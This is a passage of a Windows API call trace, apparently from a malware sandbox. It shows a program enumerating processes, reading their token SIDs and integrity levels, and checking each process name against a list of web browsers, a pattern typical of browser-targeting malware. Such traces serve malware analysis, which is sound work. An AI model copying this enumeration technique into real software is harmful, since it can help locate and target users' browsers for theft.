bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0227.041] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.041] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.041] GetLastError () returned 0x7a [0227.041] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.041] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.041] CloseHandle (hObject=0xb8) returned 1 [0227.041] CloseHandle (hObject=0xb4) returned 1 [0227.042] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0227.042] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165d08, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.042] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.042] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.042] GetLastError () returned 0x7a [0227.042] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.042] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.042] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.043] CloseHandle (hObject=0xb8) returned 1 [0227.043] CloseHandle (hObject=0xb4) returned 1 [0227.043] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0227.043] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0227.043] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0227.043] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0227.043] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0227.043] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0227.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0227.043] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.044] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.044] GetLastError () returned 0x7a [0227.044] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.044] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.044] CloseHandle (hObject=0xb8) returned 1 [0227.044] CloseHandle (hObject=0xb4) returned 1 [0227.044] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0227.044] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165ea0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.045] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.045] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.045] GetLastError () returned 0x7a [0227.045] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.045] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.045] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.045] CloseHandle (hObject=0xb8) returned 1 [0227.045] CloseHandle (hObject=0xb4) returned 1 [0227.045] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0227.046] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0227.046] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0227.046] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0227.046] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0227.046] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0227.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0227.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0227.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0227.046] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.046] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.046] GetLastError () returned 0x7a [0227.047] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.047] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.047] CloseHandle (hObject=0xb8) returned 1 [0227.047] CloseHandle (hObject=0xb4) returned 1 [0227.047] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0227.047] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1664e8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.047] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.047] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.048] GetLastError () returned 0x7a [0227.048] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.048] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.048] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.048] CloseHandle (hObject=0xb8) returned 1 [0227.048] CloseHandle (hObject=0xb4) returned 1 [0227.048] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0227.048] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0227.048] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0227.049] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0227.049] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0227.049] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0227.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0227.049] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.049] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.049] GetLastError () returned 0x7a [0227.049] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.049] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.049] CloseHandle (hObject=0xb8) returned 1 [0227.050] CloseHandle (hObject=0xb4) returned 1 [0227.050] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0227.050] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1669e0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.050] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.050] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.050] GetLastError () returned 0x7a [0227.050] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.050] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.050] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.051] CloseHandle (hObject=0xb8) returned 1 [0227.051] CloseHandle (hObject=0xb4) returned 1 [0227.051] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0227.051] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0227.051] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0227.051] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0227.051] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0227.051] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0227.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0227.051] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.052] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.052] GetLastError () returned 0x7a [0227.052] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.052] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.052] CloseHandle (hObject=0xb8) returned 1 [0227.052] CloseHandle (hObject=0xb4) returned 1 [0227.052] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0227.052] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166af8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.053] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.053] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.053] GetLastError () returned 0x7a [0227.053] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.053] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.053] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.053] CloseHandle (hObject=0xb8) returned 1 [0227.053] CloseHandle (hObject=0xb4) returned 1 [0227.053] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0227.054] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0227.054] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0227.054] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0227.054] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0227.054] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0227.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0227.054] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.054] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.054] GetLastError () returned 0x7a [0227.054] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.054] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.055] CloseHandle (hObject=0xb8) returned 1 [0227.055] CloseHandle (hObject=0xb4) returned 1 [0227.055] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0227.055] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166c10, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.055] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.055] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.055] GetLastError () returned 0x7a [0227.055] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.056] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.056] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.056] CloseHandle (hObject=0xb8) returned 1 [0227.056] CloseHandle (hObject=0xb4) returned 1 [0227.056] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0227.056] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0227.056] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0227.056] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0227.056] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0227.056] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0227.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0227.057] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.057] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.057] GetLastError () returned 0x7a [0227.057] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.057] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.057] CloseHandle (hObject=0xb8) returned 1 [0227.057] CloseHandle (hObject=0xb4) returned 1 [0227.057] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0227.058] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166d50, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.058] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.058] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.058] GetLastError () returned 0x7a [0227.058] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.058] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.058] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.058] CloseHandle (hObject=0xb8) returned 1 [0227.059] CloseHandle (hObject=0xb4) returned 1 [0227.059] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0227.059] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0227.059] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0227.059] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0227.059] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0227.059] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0227.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0227.059] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.059] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.060] GetLastError () returned 0x7a [0227.060] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.060] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.060] CloseHandle (hObject=0xb8) returned 1 [0227.060] CloseHandle (hObject=0xb4) returned 1 [0227.060] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.060] OpenProcess 